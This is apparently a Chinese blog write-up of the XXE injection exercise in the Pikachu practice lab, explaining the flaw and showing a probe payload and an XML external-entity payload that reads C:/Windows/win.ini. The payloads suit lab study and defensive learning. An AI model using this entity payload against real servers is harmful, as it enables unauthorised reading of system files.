pikachu靶场~XXE注入

在这里插入图片描述
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)、内网扫描等危害。
image-20240730113946820

# 看到XXE页面有一个post提交框,我们先输入内容然后进行抓包

image-20240730114427924

 # 发现是xml型,然后我们就用测试语句
 <!DOCTYPE a [<!ENTITY b "xxe">]><c>&b;</c>
 # 如果返回xee证明存在漏洞

image-20240730114822931

# 然后我们开始对其进行payload
<!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///C:/Windows/win.ini"> ]><x>&f;</x>

image-20240730115007305

jk1r-1722341616540)]

测试成功,完成练习

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值